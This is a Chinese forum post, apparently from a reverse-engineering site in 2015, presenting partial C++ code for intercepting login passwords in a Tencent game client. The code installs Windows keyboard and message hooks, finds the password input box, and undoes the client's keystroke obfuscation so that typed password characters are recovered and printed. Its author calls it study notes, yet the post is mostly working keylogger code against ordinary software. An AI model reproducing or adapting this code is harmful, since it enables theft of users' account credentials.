-
-
[原创]TX游戏登陆密码截取
-
发表于:
2015-6-30 01:19
5290
-
先申明。此文仅是自己学习研究的记录,由于上次发那个TX登陆的,公布代码,被和鞋了。所以此次不公开代码(而且公布所造成影响太大),也只公开部分研究成果。不喜勿喷。能看懂的就看懂。看不懂的绕过。。,最好能结合本人上次的贴子看。
bool bPlainCase =true;
int g_Key =0;
void WINAPI FilterLowLevelKeyboardProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if(nCode == HC_ACTION)
{
PKBDLLHOOKSTRUCT pKdb = (PKBDLLHOOKSTRUCT)lParam;
if( wParam == WM_KEYDOWN && IsVkCodeNeed(pKdb->vkCode) )
{
if( ::GetFocus() == g_hPwd ) //判断是不是在输入密码
{
TCHAR tcText[100];
if( bPlainCase )
{
// _stprintf_s(tcText,_T("原始虚键码:%d"),pKdb->vkCode);
if(96 <=pKdb->vkCode && pKdb->vkCode<=105 )
pKdb->vkCode -=48;
g_Key=pKdb->vkCode;
bPlainCase=false;
// OutputDebugString(tcText);
}else
{
if(96 <=pKdb->vkCode && pKdb->vkCode<=105 )
pKdb->vkCode -=48;
// _stprintf_s(tcText,_T("加密虚拟码:%d,当前key:%d"),pKdb->vkCode,g_Key);
SetKeyPair(pKdb->vkCode,g_Key);
bPlainCase=true;
// OutputDebugString(tcText);
}
}
}
}
}
LRESULT CALLBACK GetMsgProc(__in int code,__in WPARAM wParam,__in LPARAM lParam
)
{
if( code == HC_ACTION )
{
MSG * pMsg =(MSG*)lParam;
LONG dwStyle = GetWindowLong(pMsg->hwnd,GWL_STYLE);
if( !g_hPwd &&
dwStyle & ES_PASSWORD &&
!( dwStyle&ES_MULTILINE) )
{
g_hPwd=pMsg->hwnd;
/*TCHAR tcTetxt[50];
_stprintf_s(tcTetxt,_T("密码控件句柄:%x"),g_hPwd);
OutputDebugString(tcTetxt);*/
}
if( !g_hKeyboardHook && ::GetFocus() == g_hPwd)
{
// g_hKeyboardHook=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,g_hMod,GetCurrentThreadId());
if( GetModuleHandle(_T("fszwd.dat")) )
SetMintor();
//dwTimerId = SetTimer(g_hPwd,0x1000,0x10,InputPwdTimer);
}
if( pMsg->message ==WM_CHAR )
{
TCHAR tcTetxt[50]={0};
SHORT sVk=0;
SHORT sOrgVk=0;
if( IsCharNeed(pMsg->wParam) && ::GetFocus() ==g_hPwd )
{
if( pMsg->wParam >='A' && pMsg->wParam <= 'Z' )
sVk = VkKeyScan(pMsg->wParam+0x20);
else
sVk = VkKeyScan(pMsg->wParam);
sOrgVk = GetPlainVkcode(sVk); //获取原始虚键码
if( sOrgVk )
{
_stprintf_s(tcTetxt,_T("ascii码:%d,解密的字符:%c"),pMsg->wParam ,pMsg->wParam + sOrgVk - sVk);
}else
_stprintf_s(tcTetxt,_T("ascii码:%d,未解密的字符:%c"),pMsg->wParam ,pMsg->wParam);
}else
{
_stprintf_s(tcTetxt,_T("没有加密的字符:%c"),pMsg->wParam);
}
OutputDebugString(tcTetxt);
}
}
return CallNextHookEx(0,code,wParam,lParam);
}
运行结果:
[课程]Linux pwn 探索篇!